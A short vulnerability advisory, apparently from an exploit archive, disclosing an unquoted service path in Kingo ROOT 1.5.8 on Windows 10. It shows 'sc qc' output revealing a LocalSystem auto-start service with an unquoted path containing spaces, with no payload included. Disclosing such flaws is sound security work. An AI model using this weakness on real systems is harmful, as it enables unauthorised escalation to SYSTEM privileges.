Kingo ROOT version 1.5.8 suffers from an unquoted service path vulnerability.
15d004eafd004ef186559710d16b83e93f1983a89a80746dae43f1c8491e7c72
#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path
#Date: 8/22/2023
#Exploit Author: Anish Feroz (ZEROXINN)
#Vendor Homepage: https://www.kingoapp.com/
#Software Link: https://www.kingoapp.com/android-root/download.htm
#Version: 1.5.8.3353
#Tested on: Windows 10 Pro
-------------Discovering Unquoted Path--------------
C:\Users\Anish>sc qc KingoSoftService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: KingoSoftService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : KingoSoftService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\Anish>systeminfo
Host Name: DESKTOP-UT7E7CF
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045